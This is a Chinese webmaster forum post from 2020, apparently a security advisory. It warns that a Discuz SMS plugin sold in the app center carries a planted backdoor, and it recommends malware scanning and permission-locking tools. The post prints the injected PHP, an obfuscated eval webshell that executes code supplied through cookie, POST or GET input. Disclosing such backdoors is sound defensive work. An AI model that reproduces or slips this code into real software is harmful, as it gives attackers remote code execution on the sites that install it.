·Home 2019 登陆记录 最新更新 资料库SEO官方淘宝店
查看: 36|回复: 0

应用中心可可作者冷门正版插件下载包含后门疑似被黑客植入安全威胁通报

[复制链接]

773

主题

1551

能量

5

贡献币

无敌战神

Rank: 9Rank: 9Rank: 9

发表于 2020-5-2 22:09:55 | 显示全部楼层 |阅读模式

应用中心可可作者冷门正版插件下载包含后门疑似被黑客植入安全威胁通报:

涉及插件:
手机短信模块(https://addon.dismall.com/[email protected]_sms.plugin

存在:ca.php 加密文件

app.inc.php  植入文件内容:
  1. function _strint($key){
  2.         return strrev($key);
  3. }
  4. function log1($log){
  5.         lone(_strint(strrev($log)));
  6. }
  7. function lone($key){
  8.         $str = "";
  9.         return eval($str.$key.$str);
  10. }
  11. foreach (array('_COOKIE','_POST','_GET') as $_request)
  12. {
  13.     foreach ($_request as $_key=>$_value)
  14.     {
  15.         $_key=  $_value;
  16.     }
  17. }
  18. $id = isset($jsha) ? $id : 2;
  19. log1($jsha);
复制代码


建议非可靠来源插件先D盾扫描:http://www.d99net.net/down/d_safe_2.1.5.4.zip



建议网站、服务器安全除了宝塔自身防护墙、安全加固外,云锁进行权限锁定,防止后门偷盗分子偷盗站长源码,用云锁锁死后,基本上也是死病毒:
云锁下载了解地址:http://www.yunsuo.com.cn/download.html【强烈建议】



最后忠告:切勿贪图信用低的渠道来源、“好心人”、“乐于助人”的瘾小人等一切形式的援助,切勿和其他“好心”站长交换资源,目前站长帮收集的“好心”黑名单200+,网络好心人甚少,且行且珍惜,踏实做站,不要追求建站功能,而要精于功能基于运营来转化盈利点的建站思路。
个人建站安全、内容安全请各位站长务必时刻保持清醒,对自己负责,对建站态度负责。

帖子地址: 

 懒得打字嘛,点击右侧快捷回复【最新发布】   【赞助站长帮享更多权益】
高级模式
您需要登录后才可以回帖 登录 | 立即注册 用百度帐号登录

本版积分规则

收缩
发布主题 快速回复 收藏帖子 返回列表 联系我们 搜索 官方QQ群
成为站长帮会员,享受Discuz!建站插件、模板、技术支持等全方位服务。 会员登录 注册会员

站长帮.(zzb7.net) ( 京ICP备18032088号-2 ) |GMT+8, 2020-6-2 12:28

Processed in 0.195841 second(s) , Gzip On, Redis On. 小黑屋|繁體
快速回复 返回顶部 返回列表